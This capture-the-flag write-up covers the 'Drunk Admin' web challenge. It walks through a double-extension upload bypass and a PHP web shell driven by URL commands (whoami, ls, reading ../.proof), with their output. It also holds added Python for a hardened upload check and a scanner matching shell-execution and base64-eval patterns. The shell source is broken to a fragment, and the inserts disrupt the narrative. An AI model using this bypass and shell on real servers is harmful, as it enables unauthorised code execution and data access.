/*
** "Drunk Admin" Web hacking challenge tutorial
** http://x.x.x.x:8880
**
** Kyriakos Ispoglou - Undergraduate Student
**
** Computer Engineering & Informatics Department
** University of Patras, Greece
*/

We start by enumerating the application (using Burp Suite). We find the files:

    index.php
    image.php
    upload.php
    info.php
    myphp.php?id=102

The last file shows the PHP credits. We know that the phpinfo() function is used for showing credits (and other information, of course). Thus id may be the '$what' parameter of phpinfo(), so we try to modify the id parameter. If we change id to 99, we get a lot of information about PHP credits and configuration.

Then we try to understand the application's logic. We upload an image named pic.png. upload.php is called (which uploads the image) and then image.php shows our picture. If we view the page source code, we will see:

    ...
    ...
    ...
    ...

Our image is renamed before it is stored on the server in the /images directory. The image's name looks like an MD5 hash because it is 32 bytes long and contains only digits and the characters a-f. After uploading some images, we end up with:

    name.xxx renames to: md5( 'name.xxx' ) . '.xxx'

(where xxx is a valid image extension).

We can bypass the application's validation by uploading a PHP file named image.jpg.php. The file will then be renamed to md5( 'image.jpg.php' ) . '.php' in the /images directory. Thus we can upload a PHP file and execute our code on the server by calling our file from the URL:

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php

We write the following PHP code in order to execute shell commands on the server:

    "; } } ?>

With this code we can execute basic Unix shell commands. The 'command' argument contains the shell command to be executed on the server. In order to view the contents of a file which may contain HTML special characters as plaintext in the browser, we use the htmlspecialchars() function and the 'file' argument.
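The double-extension bypass above works because the upload handler decides on a client-supplied name that merely contains an allowed extension somewhere, and then keeps that name's last extension when it stores the file. The following Python is an added example, not the challenge's upload.php (which is not reproduced on this page): naive_accepts() and naive_rename() are an assumed reconstruction of that flawed logic, placed next to a hardened version that accepts only a single, final, whitelisted extension, derives the stored extension from the file's magic bytes rather than from the name, and stores the file under a random name. The function names, the ALLOWED_IMAGE_EXTENSIONS whitelist and the MAGIC table are all assumptions made for the example.

```python
import hashlib
import os
import secrets

# Extensions the upload handler is willing to keep. Assumed for this example;
# the challenge's real whitelist is not shown on the page.
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the image formats we accept (assumed table for the example).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def naive_accepts(filename: str) -> bool:
    """Permissive check of the kind the writeup defeats (assumed reconstruction):
    the name passes if an allowed extension appears anywhere in it, so
    'image.jpg.php' is accepted just like 'pic.png'."""
    lower = filename.lower()
    return any("." + ext in lower for ext in ALLOWED_IMAGE_EXTENSIONS)


def naive_rename(filename: str) -> str:
    """The storage name the writeup observed: md5(original name) followed by the
    original name's *last* extension, which is exactly what lets '.php' survive."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return hashlib.md5(filename.encode()).hexdigest() + "." + ext


def hardened_accepts(filename: str) -> bool:
    """Decide on the final extension only, and reject any name carrying more
    than one dot so a double extension can never reach the filesystem."""
    base = os.path.basename(filename)
    if base.count(".") != 1:
        return False
    stem, ext = base.split(".")
    return bool(stem) and ext.lower() in ALLOWED_IMAGE_EXTENSIONS


def sniff_image_extension(content: bytes):
    """Return the extension implied by the file's leading bytes, or None."""
    for magic, ext in MAGIC.items():
        if content.startswith(magic):
            return ext
    return None


def hardened_storage_name(filename: str, content: bytes) -> str:
    """Name the stored file randomly; the extension comes from the content's
    magic bytes, never from the client-supplied name."""
    ext = sniff_image_extension(content)
    if ext is None or not hardened_accepts(filename):
        raise ValueError("rejected upload")
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed inputs: the bypass name from the writeup and a benign image name.
    for name in ("image.jpg.php", "pic.png"):
        print(name, "naive:", naive_accepts(name), naive_rename(name),
              "hardened:", hardened_accepts(name))
```

Even the hardened check is not a complete fix on its own: valid magic bytes can be prepended to a script, so the upload directory must also have script execution disabled at the web-server level (for Apache, the relevant handler or engine directives in the vhost or the directory's own .htaccess), and ideally uploads are served from a separate, static-only host.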
To prevent detection of the code above, we encode the source to base64:

We start by writing:

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=whoami

to see which user we are running as: www-data.

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=pwd

to get the current directory: /var/www/images

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la

shows the contents of the /images directory.

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la ..

shows the contents of the /var/www directory:

    total 48
    drwxr-xr-x  4 root root     4096 Mar 26 22:56 .
    drwxr-xr-x 14 root root     4096 Mar  3 00:06 ..
    -rw-r--r--  1 root root      217 Mar  3 13:50 .htaccess
    -rw-r--r--  1 root root      322 Mar  6 17:02 .proof
    -rw-r--r--  1 root root     2683 Mar  7 06:41 image.php
    drwxrwxr-x  2 root www-data 4096 Mar 28 19:00 images
    -rw-r--r--  1 root root     2141 Mar 26 22:54 index.php
    -rw-r--r--  1 root root     1943 Mar  4 06:28 info.php
    -rw-r--r--  1 root root      279 Mar  4 06:26 myphp.php
    drwxr-xr-x  2 root root     4096 Mar  3 03:18 style
    -rw-r--r--  1 root root     2144 Mar  7 06:39 upload.php
    -rw-r--r--  1 root root       51 Mar  3 09:08 xmm.html

We are searching for a hidden file. What's the .proof file? Let's see:

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?file=../.proof

    #########################
    # Drunk Admin Challenge #
    #     by @anestisb      #
    #########################

    bob> Great work.
    bob> Meet me there.
    ...> ?
    bob> What? You don't know where?
    bob> Work a little more your post exploitation skills.

    Secret Code: TGglMUxecjJDSDclN1Ej

    Mail me your methods at: anestis@bechtsoudis.com

    [END OF .proof FILE]

We get a Secret Code: TGglMUxecjJDSDclN1Ej. This may be base64 encoded. We decode the Secret Code and we get:

    Lh%1L^r2CH7%7Q#

Who's bob? Is bob a user?

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home

    total 12
    drwxr-xr-x  3 root root 4096 Mar  3 00:02 .
    drwxr-xr-x 21 root root 4096 Mar  2 23:56 ..
    drwxr-xr-x  4 bob  bob  4096 Mar  6 16:17 bob

Yes, bob is a user on the server.

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home/bob

    total 28
    drwxr-xr-x 4 bob  bob  4096 Mar  6 16:17 .
    drwxr-xr-x 3 root root 4096 Mar  3 00:02 ..
    -rw-r--r-- 1 bob  bob   220 Mar  3 00:02 .bash_logout
    -rw-r--r-- 1 bob  bob  3184 Mar  3 00:02 .bashrc
    -rw-r--r-- 1 bob  bob   675 Mar  3 00:02 .profile
    drwxr-xr-x 2 root root 4096 Mar  6 16:16 Documents
    drwxr-xr-x 3 bob  bob  4096 Mar  6 17:01 public_html

    http://x.x.x.x:8880/images/7bcd28a0e203f794a78cb856ed50efd6.php?command=ls -la /home/bob/public_html

    total 20
    drwxr-xr-x 3 bob bob 4096 Mar  6 17:01 .
    drwxr-xr-x 4 bob bob 4096 Mar  6 16:17 ..
    -rw-r--r-- 1 bob bob 1730 Mar  6 16:49 encrypt.php
    drwxr-xr-x 2 bob bob 4096 Mar  6 16:55 include
    -rw-r--r-- 1 bob bob  791 Mar  6 17:01 index.php

We can access this index.php from the browser:

    http://x.x.x.x:8880/~bob/

Finally, we enter the decoded Secret Code in the form, and we get:

    Alice, prepare for a kinky night. Meet me at '35.517286' '24.017637'

If we enter these numbers in Google Maps, we get the secret location: Coast Tombazis 7, Chania, Crete, Greece. That's it!
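The writeup hides the shell's source behind base64 to avoid content inspection and leaves it in /images under an MD5-style name with a .php extension. The following Python is an added example of the defender-side check that catches those traces, not the challenge's or the author's code: it scans an upload directory and flags an executable extension where only images belong, a PHP open tag inside a file, an eval() wrapped around base64_decode(), and direct shell-execution calls. The file names and contents it scans (SAMPLE_UPLOADS) are constructed inline for the example, and the indicator lists and regular expressions are this example's own choices.

```python
import os
import re
import tempfile

# Extensions the web server would hand to the PHP interpreter; none of them
# belongs in a directory that is supposed to hold only uploaded images.
EXECUTABLE_EXTS = {"php", "phtml", "php3", "php4", "php5", "phar"}

PHP_TAG = re.compile(rb"<\?(php|=)")
# The evasion used in the writeup: source kept in base64 and handed to eval().
ENCODED_EVAL = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
SHELL_CALLS = re.compile(rb"\b(system|shell_exec|passthru|exec|popen)\s*\(",
                         re.IGNORECASE)

# Constructed sample uploads (names and contents invented for this example;
# the .php and .jpg bodies only carry the indicators, they are not working code).
SAMPLE_UPLOADS = {
    "00000000000000000000000000000001.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "00000000000000000000000000000002.php": b"<?php eval(base64_decode('QUJD')); ?>",
    "00000000000000000000000000000003.jpg": b"\xff\xd8\xff\xe0" + b"<?php system($cmd); ?>",
}


def inspect_file(path: str) -> list:
    """Return the indicators found in one file (an empty list means clean)."""
    findings = []
    name = os.path.basename(path)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in EXECUTABLE_EXTS:
        findings.append("executable extension in upload directory")
    with open(path, "rb") as f:
        head = f.read(65536)  # the first 64 KiB is enough for the patterns above
    if PHP_TAG.search(head):
        findings.append("php open tag")
    if ENCODED_EVAL.search(head):
        findings.append("base64-wrapped eval")
    if SHELL_CALLS.search(head):
        findings.append("shell execution call")
    return findings


def scan_upload_dir(directory: str) -> dict:
    """Map every suspicious file name in the directory to its indicators."""
    report = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            findings = inspect_file(path)
            if findings:
                report[name] = findings
    return report


def build_sample_dir() -> str:
    """Write the constructed samples into a fresh temporary directory."""
    directory = tempfile.mkdtemp(prefix="uploads-")
    for name, content in SAMPLE_UPLOADS.items():
        with open(os.path.join(directory, name), "wb") as f:
            f.write(content)
    return directory


if __name__ == "__main__":
    for name, findings in scan_upload_dir(build_sample_dir()).items():
        print(name, "->", ", ".join(findings))
```

Run periodically or from an inotify hook on the upload directory, a scan like this turns the writeup's "rename to MD5 and keep the extension" weakness into an alert: a .php file, or an image file that contains a PHP tag, should never appear under /images, and the base64-plus-eval pattern is the specific evasion the writeup relies on.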